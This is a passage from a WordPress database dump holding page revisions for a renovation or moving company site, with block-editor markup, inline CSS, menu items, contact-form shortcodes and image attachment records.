auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item --></div></div>\n<!-- /wp:skt-blocks/accordion --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPaddingMobile\":40,\"blockId\":\"7efd7e06-15e9-4409-bd57-879837f4059f\"} -->\n<style type=\"text/css\"> .block-7efd7e06-15e9-4409-bd57-879837f4059f .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-7efd7e06-15e9-4409-bd57-879837f4059f .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-7efd7e06-15e9-4409-bd57-879837f4059f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-7efd7e06-15e9-4409-bd57-879837f4059f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-7efd7e06-15e9-4409-bd57-879837f4059f .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-7efd7e06-15e9-4409-bd57-879837f4059f\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":20,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/faq-img.jpg\" alt=\"\" class=\"wp-image-20\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"b3881bfe-ff5b-4775-a6c8-e6734143f906\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"boxShadowColor\":\"\",\"boxShadowPosition\":\"\",\"className\":\"gb-renovation-section-9\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-9 skt-blocks-block-section-outer-wrap block-b3881bfe-ff5b-4775-a6c8-e6734143f906 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-b3881bfe-ff5b-4775-a6c8-e6734143f906 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-b3881bfe-ff5b-4775-a6c8-e6734143f906.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-b3881bfe-ff5b-4775-a6c8-e6734143f906.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-b3881bfe-ff5b-4775-a6c8-e6734143f906 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-b3881bfe-ff5b-4775-a6c8-e6734143f906.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px  \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"f9f368f3-3d60-4546-bb21-46a4d6d60415\"} -->\n<style type=\"text/css\"> .block-f9f368f3-3d60-4546-bb21-46a4d6d60415 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-f9f368f3-3d60-4546-bb21-46a4d6d60415 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-f9f368f3-3d60-4546-bb21-46a4d6d60415 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-f9f368f3-3d60-4546-bb21-46a4d6d60415 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-f9f368f3-3d60-4546-bb21-46a4d6d60415 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-f9f368f3-3d60-4546-bb21-46a4d6d60415 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-f9f368f3-3d60-4546-bb21-46a4d6d60415 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-f9f368f3-3d60-4546-bb21-46a4d6d60415 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"blockId\":\"6c7f2244-b638-4062-a64f-a98f96e558ed\"} -->\n<style type=\"text/css\"> .block-6c7f2244-b638-4062-a64f-a98f96e558ed .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-6c7f2244-b638-4062-a64f-a98f96e558ed .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-6c7f2244-b638-4062-a64f-a98f96e558ed .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-6c7f2244-b638-4062-a64f-a98f96e558ed .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6c7f2244-b638-4062-a64f-a98f96e558ed .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-6c7f2244-b638-4062-a64f-a98f96e558ed\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"f9f78eae-449c-455e-8fdd-a5882512983b\",\"showHeading\":false,\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"separatorSpacingTablet\":35,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":17,\"headingTitleFontSizeMobile\":0,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-title-text {\n font-size: 17px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-seperator {\n margin-bottom: 35px !important; }\n\n.skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-title-text {\n font-size: 0px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-f9f78eae-449c-455e-8fdd-a5882512983b {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-f9f78eae-449c-455e-8fdd-a5882512983b\"><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Our Safe Moving<br>Procedures</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":30,\"blockId\":\"0924911c-74b7-4907-822b-208200e225a5\"} -->\n<style type=\"text/css\"> .block-0924911c-74b7-4907-822b-208200e225a5 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-0924911c-74b7-4907-822b-208200e225a5 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-0924911c-74b7-4907-822b-208200e225a5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-0924911c-74b7-4907-822b-208200e225a5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-0924911c-74b7-4907-822b-208200e225a5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-0924911c-74b7-4907-822b-208200e225a5\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"View All\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/blog-full-width/\",\"counterId\":\"a3a7f8e1-d3ba-413d-9b6f-e963bd071379\",\"hPadding\":25,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 25px; padding-right: 25px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n@media only screen and (max-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n@media only screen and (max-width: 767px){\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/blog-full-width/\">View All</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/skt-blocks-post-grid {\"postsToShow\":2,\"displayPostExcerpt\":false,\"displayPostAuthor\":false,\"postTitleTag\":\"h5\",\"readMoreText\":\"Read More\",\"bgColor\":\"#ffffff\",\"imageBorderRadius\":0,\"metaColor\":\"#6a6a6a\",\"readMoreLinkColor\":\"#fc8134\",\"titleColor\":\"#282828\",\"titleHoverColor\":\"#0d2e63\",\"contentPadding\":0,\"continueFontSize\":16,\"continueFontWeight\":\"600\",\"titleFontSize\":24,\"titleLineHeight\":1.2,\"titleFontWeight\":\"400\",\"metaFontSize\":16,\"metaFontWeight\":\"400\",\"metaTextTransform\":\"capitalize\",\"titleFontFamily\":\"Poppins\",\"metaFontFamily\":\"Poppins\",\"rowGap\":0,\"postGridBlockId\":\"89bc1d0c\"} /--></div></section></div>\n<!-- /wp:skt-blocks/section -->','Home','','inherit','closed','closed','','336-revision-v1','','','2022-08-22 20:18:41','2022-08-22 20:18:41','',336,'https://cteisys.com/?p=390',0,'revision','',0),(396,1,'2022-08-23 18:37:29','2022-08-22 21:49:08',' ','','','publish','closed','closed','','396','','','2022-08-23 18:37:29','2022-08-23 18:37:29','',160,'https://cteisys.com/?p=396',1,'nav_menu_item','',0),(397,1,'2022-08-23 18:37:29','2022-08-22 21:49:08',' ','','','publish','closed','closed','','397','','','2022-08-23 18:37:29','2022-08-23 18:37:29','',160,'https://cteisys.com/?p=397',2,'nav_menu_item','',0),(398,1,'2022-08-23 18:37:29','2022-08-22 21:49:08',' ','','','publish','closed','closed','','398','','','2022-08-23 18:37:29','2022-08-23 18:37:29','',160,'https://cteisys.com/?p=398',3,'nav_menu_item','',0),(399,1,'2022-08-23 18:37:29','2022-08-22 21:49:08',' ','','','publish','closed','closed','','399','','','2022-08-23 18:37:29','2022-08-23 18:37:29','',160,'https://cteisys.com/?p=399',4,'nav_menu_item','',0),(400,1,'2022-08-23 18:37:29','2022-08-22 21:49:08',' ','','','publish','closed','closed','','400','','','2022-08-23 18:37:29','2022-08-23 18:37:29','',160,'https://cteisys.com/?p=400',5,'nav_menu_item','',0),(401,1,'2022-08-22 21:50:18','2022-08-22 21:50:18','<!-- wp:shortcode -->\n[contact-form-7 id=\"6\" title=\"Contact form 1\"]\n<!-- /wp:shortcode -->','Contact Us','','inherit','closed','closed','','140-revision-v1','','','2022-08-22 21:50:18','2022-08-22 21:50:18','',140,'https://cteisys.com/?p=401',0,'revision','',0),(402,1,'2022-08-22 21:52:45','2022-08-22 21:52:45','<!-- wp:shortcode -->\n[contact-form-7 id=\"6\" title=\"Contact form 1\"]\n<!-- /wp:shortcode -->','Contact Layout 1','','inherit','closed','closed','','140-revision-v1','','','2022-08-22 21:52:45','2022-08-22 21:52:45','',140,'https://cteisys.com/?p=402',0,'revision','',0),(403,1,'2022-08-23 18:37:29','2022-08-22 22:20:01','','Contact Us','','publish','closed','closed','','contact-us','','','2022-08-23 18:37:29','2022-08-23 18:37:29','',0,'https://cteisys.com/?p=403',6,'nav_menu_item','',0),(405,1,'2022-08-22 22:30:32','2022-08-22 22:30:32','<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:shortcode -->\n[contact-form-7 id=\"6\" title=\"Contact form 1\"]\n<!-- /wp:shortcode --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->','Contact Layout 1','','inherit','closed','closed','','140-revision-v1','','','2022-08-22 22:30:32','2022-08-22 22:30:32','',140,'https://cteisys.com/?p=405',0,'revision','',0),(407,1,'2022-08-22 22:35:52','2022-08-22 22:35:52','','17992072_1641106229237145_7019424871005086701_n','','inherit','','closed','','17992072_1641106229237145_7019424871005086701_n','','','2022-08-22 22:35:52','2022-08-22 22:35:52','',0,'https://cteisys.com/wp-content/uploads/2022/08/17992072_1641106229237145_7019424871005086701_n.jpg',0,'attachment','image/jpeg',0),(408,1,'2022-08-22 22:35:54','2022-08-22 22:35:54','','23915753_1868197049861394_4966732368910344520_n (1)','','inherit','','closed','','23915753_1868197049861394_4966732368910344520_n-1','','','2022-08-22 22:35:54','2022-08-22 22:35:54','',0,'https://cteisys.com/wp-content/uploads/2022/08/23915753_1868197049861394_4966732368910344520_n-1.jpg',0,'attachment','image/jpeg',0),(409,1,'2022-08-22 22:35:55','2022-08-22 22:35:55','','32871742_2062360347111729_638238904759091200_n','','inherit','','closed','','32871742_2062360347111729_638238904759091200_n','','','2022-08-22 22:35:55','2022-08-22 22:35:55','',0,'https://cteisys.com/wp-content/uploads/2022/08/32871742_2062360347111729_638238904759091200_n.jpg',0,'attachment','image/jpeg',0),(410,1,'2022-08-22 22:35:56','2022-08-22 22:35:56','','33584475_2069581393056291_797039715596369920_n','','inherit','','closed','','33584475_2069581393056291_797039715596369920_n','','','2022-08-22 22:35:56','2022-08-22 22:35:56','',0,'https://cteisys.com/wp-content/uploads/2022/08/33584475_2069581393056291_797039715596369920_n.jpg',0,'attachment','image/jpeg',0),(411,1,'2022-08-22 22:35:58','2022-08-22 22:35:58','','248413504_4961941493820252_6022205579321516239_n','','inherit','','closed','','248413504_4961941493820252_6022205579321516239_n','','','2022-08-22 22:35:58','2022-08-22 22:35:58','',0,'https://cteisys.com/wp-content/uploads/2022/08/248413504_4961941493820252_6022205579321516239_n.jpg',0,'attachment','image/jpeg',0),(412,1,'2022-08-22 22:36:02','2022-08-22 22:36:02','','280659088_5602458996435162_2458487168335242841_n','','inherit','','closed','','280659088_5602458996435162_2458487168335242841_n','','','2022-08-22 22:36:02','2022-08-22 22:36:02','',0,'https://cteisys.com/wp-content/uploads/2022/08/280659088_5602458996435162_2458487168335242841_n.jpg',0,'attachment','image/jpeg',0),(413,1,'2022-08-22 22:36:05','2022-08-22 22:36:05','','c60adea113fb2f5f80419bb170309509','','inherit','','closed','','c60adea113fb2f5f80419bb170309509','','','2022-08-22 22:36:05','2022-08-22 22:36:05','',0,'https://cteisys.com/wp-content/uploads/2022/08/c60adea113fb2f5f80419bb170309509.jpg',0,'attachment','image/jpeg',0),(414,1,'2022-08-22 22:36:06','2022-08-22 22:36:06','','DSC03903 (1)','','inherit','','closed','','dsc03903-1','','','2022-08-22 22:36:06','2022-08-22 22:36:06','',0,'https://cteisys.com/wp-content/uploads/2022/08/DSC03903-1.jpg',0,'attachment','image/jpeg',0),(430,1,'2022-08-23 18:22:23','2022-08-23 18:22:23','<!-- wp:skt-blocks/section 